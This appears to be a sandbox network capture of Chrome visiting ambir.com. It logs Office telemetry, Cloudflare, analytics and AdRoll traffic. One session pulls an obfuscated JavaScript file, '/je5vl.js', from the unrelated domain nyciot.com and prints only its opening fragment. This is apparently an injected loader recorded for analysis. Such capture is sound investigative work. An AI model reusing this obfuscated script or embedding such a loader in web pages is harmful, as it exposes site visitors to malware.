                                                                                                                                                                                              2024-11-20 20:28:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              57192.168.2.54977613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                                              x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202823Z-185f5d8b95cdtclvhC1NYC4rmc0000000as0000000019fv8
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              58192.168.2.549787104.16.123.964431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC547OUTGET /cdn-cgi/trace HTTP/1.1
                                                                                                                                                                                              Host: www.cloudflare.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fa6cdba0f9c-EWR
                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              2024-11-20 20:28:23 UTC314INData Raw: 31 33 33 0d 0a 66 6c 3d 31 31 66 36 38 33 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 37 35 0a 74 73 3d 31 37 33 32 31 33 34 35 30 33 2e 34 38 33 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31
                                                                                                                                                                                              Data Ascii: 133fl=11f683h=www.cloudflare.comip=8.46.123.75ts=1732134503.483visit_scheme=httpsuag=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv1
                                                                                                                                                                                              2024-11-20 20:28:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              59192.168.2.54978213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                                              x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202823Z-178bfbc474btvfdfhC1NYCa2en00000000n0000000004kz9
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              60192.168.2.54978845.61.136.1964431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC342OUTGET /je5vl.js HTTP/1.1
                                                                                                                                                                                              Host: nyciot.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:24 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: max-age=604800, public
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Content-Length: 5847
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              2024-11-20 20:28:24 UTC5847INData Raw: 20 0d 0a 76 61 72 20 5f 30 78 35 39 36 33 31 31 3d 5f 30 78 63 32 66 32 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 65 34 62 30 61 2c 5f 30 78 38 32 31 38 62 29 7b 76 61 72 20 5f 30 78 33 34 31 63 35 39 3d 5f 30 78 63 32 66 32 2c 5f 30 78 33 38 38 65 63 39 3d 5f 30 78 32 65 34 62 30 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 33 32 65 33 63 35 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 32 30 32 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 32 31 32 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 31 63 35 39 28 30 78 32 31 38 29 29 2f 30 78 34
                                                                                                                                                                                              Data Ascii: var _0x596311=_0xc2f2;(function(_0x2e4b0a,_0x8218b){var _0x341c59=_0xc2f2,_0x388ec9=_0x2e4b0a();while(!![]){try{var _0x32e3c5=parseInt(_0x341c59(0x202))/0x1+-parseInt(_0x341c59(0x212))/0x2+parseInt(_0x341c59(0x1fb))/0x3*(-parseInt(_0x341c59(0x218))/0x4


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              61192.168.2.549790216.239.36.1814431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1270OUTPOST /g/collect?v=2&tid=G-5NGH3KRVGD&gtm=45be4bj0v9180601725za200&_p=1732134497159&_gaz=1&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=59994235.1732134501&ecid=1978750408&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&ec_mode=a&_s=1&sid=1732134500&sct=1&seg=0&dl=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&dt=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&en=page_view&_fv=1&_nsi=1&_ss=1&_ee=1&tfd=11005 HTTP/1.1
                                                                                                                                                                                              Host: analytics.google.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC840INHTTP/1.1 204 No Content
                                                                                                                                                                                              Access-Control-Allow-Origin: https://ambir.com
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                              Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                              Server: Golfe2
                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              62192.168.2.54978618.165.220.614431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:23 UTC542OUTGET /j/GXXT3DJJNNBKHGBC62RAND/roundtrip.js HTTP/1.1
                                                                                                                                                                                              Host: s.adroll.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:25 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                              Content-Length: 120231
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 12:03:29 GMT
                                                                                                                                                                                              Etag: "a60cc99f2fa7d8be630927ab20fc597f"
                                                                                                                                                                                              X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                              Cache-Control: max-age=3600, must-revalidate
                                                                                                                                                                                              X-Amz-Version-Id: oWcbi6qMfwD1pKJOfG7NZjRglZlRbXHq
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                              Via: 1.1 a74cbe062c9465931012948f56ea9e24.cloudfront.net (CloudFront)
                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                              Access-Control-Allow-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Methods: GET
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Max-Age: 600
                                                                                                                                                                                              X-Cache: Miss from cloudfront
                                                                                                                                                                                              X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                              X-Amz-Cf-Id: kxR7rUJTTBj8-4QP6yE35WANVvKXRM1ADyeLgzGNiNj_NgG52lvJ3w==
                                                                                                                                                                                              2024-11-20 20:28:25 UTC6396INData Raw: 74 72 79 20 7b 0a 20 20 20 20 0a 20 20 20 20 5f 5f 61 64 72 6f 6c 6c 2e 6c 6f 61 64 5f 61 64 72 6f 6c 6c 5f 74 70 63 28 5f 5f 61 64 72 6f 6c 6c 2e 72 65 6e 64 65 72 5f 61 64 76 65 72 74 69 73 61 62 6c 65 5f 63 65 6c 6c 29 3b 0a 7d 0a 63 61 74 63 68 28 65 29 20 7b 7d 0a 0a 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 5f 5f 61 64 72 6f 6c 6c 5f 5f 28 29 7b 74 68 69 73 2e 70 78 6c 73 74 61 72 74 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3b 74 68 69 73 2e 76 65 72 73 69 6f 6e 3d 22 32 2e 30 22 3b 74 68 69 73 2e 65 78 70 3d 38 37 36 30 3b 74 68 69 73 2e 65 65 78 70 3d 37 32 30 3b 74 68 69 73 2e 70 76 3d 31 45 31 31 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 74 68 69 73 2e 5f 5f 61 64 63 3d 22 5f 5f 61 72 5f 76 34
                                                                                                                                                                                              Data Ascii: try { __adroll.load_adroll_tpc(__adroll.render_advertisable_cell);}catch(e) {}try { function __adroll__(){this.pxlstart=(new Date).getTime();this.version="2.0";this.exp=8760;this.eexp=720;this.pv=1E11*Math.random();this.__adc="__ar_v4
                                                                                                                                                                                              2024-11-20 20:28:25 UTC10496INData Raw: 74 61 22 2c 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 67 67 65 72 5f 67 74 6d 5f 63 6f 6e 73 65 6e 74 5f 65 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 2c 62 2c 63 29 7b 62 3d 69 73 4e 61 4e 28 4e 75 6d 62 65 72 28 62 29 29 3f 22 63 3a 22 2b 62 3a 22 74 63 66 3a 22 2b 62 3b 21 30 21 3d 3d 63 26 26 21 31 21 3d 3d 63 26 26 28 63 3d 22 75 6e 6b 6e 6f 77 6e 22 29 3b 61 5b 63 5d 5b 62 5d 3d 31 7d 66 75 6e 63 74 69 6f 6e 20 63 28 61 29 7b 72 65 74 75 72 6e 22 2c 22 2b 6e 2e 6f 62 6a 65 63 74 5f 6b 65 79 73 28 61 29 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 2c 22 7d 69 66 28 21 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 7c 7c 22 66 75 6e 63 74 69 6f
                                                                                                                                                                                              Data Ascii: ta",a);return a};__adroll__.prototype.trigger_gtm_consent_event=function(a){function b(a,b,c){b=isNaN(Number(b))?"c:"+b:"tcf:"+b;!0!==c&&!1!==c&&(c="unknown");a[c][b]=1}function c(a){return","+n.object_keys(a).join(",")+","}if(!window.dataLayer||"functio
                                                                                                                                                                                              2024-11-20 20:28:25 UTC16384INData Raw: 61 74 61 3d 22 2b 63 7d 3b 0a 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 5f 70 61 67 65 5f 70 72 6f 70 65 72 74 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 5f 68 61 73 5f 67 6c 6f 62 61 6c 28 22 61 64 72 6f 6c 6c 5f 70 61 67 65 5f 70 72 6f 70 65 72 74 69 65 73 22 29 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 5f 67 6c 6f 62 61 6c 28 22 61 64 72 6f 6c 6c 5f 70 61 67 65 5f 70 72 6f 70 65 72 74 69 65 73 22 29 2c 62 3d 7b 7d 2c 63 3b 66 6f 72 28 63 20 69 6e 20 61 29 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 61 5b 63 5d 26 26 28 62 5b 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 3d 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 72 65 74 75 72 6e 20
                                                                                                                                                                                              Data Ascii: ata="+c};__adroll__.prototype.get_page_properties=function(){if(this._has_global("adroll_page_properties")){var a=this._global("adroll_page_properties"),b={},c;for(c in a)a.hasOwnProperty(c)&&"undefined"!==a[c]&&(b[c.toLowerCase()]=a[c]);return b}return
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1024INData Raw: 70 5f 63 6c 69 63 6b 22 29 7d 7d 65 6c 73 65 20 62 28 29 7d 3b 0a 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 66 6f 72 6d 5f 65 6c 5f 74 70 5f 61 6c 6c 6f 77 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 21 61 7c 7c 21 61 2e 74 79 70 65 7c 7c 21 74 68 69 73 2e 5f 66 6f 72 6d 5f 74 70 5f 70 72 6f 76 69 64 65 72 5f 61 6c 6c 6f 77 65 64 28 29 29 72 65 74 75 72 6e 20 61 2e 5f 61 64 72 6f 6c 6c 5f 65 6c 5f 70 72 6f 76 69 64 65 72 3d 62 2c 61 2e 5f 61 64 72 6f 6c 6c 5f 65 6c 5f 6f 6b 3d 21 31 3b 76 61 72 20 63 3d 61 2e 74 79 70 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 64 3d 28 61 2e 6e 61 6d 65 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 65 3d 74 68 69 73 2e 5f 64 65 73 63 5f 74 70 5f 65 6c 28 61 29 3b
                                                                                                                                                                                              Data Ascii: p_click")}}else b()};__adroll__.prototype._form_el_tp_allowed=function(a,b){if(!a||!a.type||!this._form_tp_provider_allowed())return a._adroll_el_provider=b,a._adroll_el_ok=!1;var c=a.type.toLowerCase(),d=(a.name||"").toLowerCase(),e=this._desc_tp_el(a);
                                                                                                                                                                                              2024-11-20 20:28:25 UTC16384INData Raw: 6f 74 6f 74 79 70 65 2e 5f 67 6c 6f 62 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 5b 61 5d 7d 3b 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 5f 67 6c 6f 62 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 62 7d 3b 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 75 6e 73 65 74 5f 67 6c 6f 62 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 61 5d 7d 3b 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 65 6e 73 75 72 65 5f 67 6c 6f 62 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 5f 68 61 73 5f 67 6c 6f 62 61 6c 28 61 29 7c 7c 74 68 69 73 2e 5f 73 65 74 5f 67 6c 6f
                                                                                                                                                                                              Data Ascii: ototype._global=function(a){return window[a]};__adroll__.prototype._set_global=function(a,b){window[a]=b};__adroll__.prototype._unset_global=function(a){delete window[a]};__adroll__.prototype._ensure_global=function(a,b){this._has_global(a)||this._set_glo
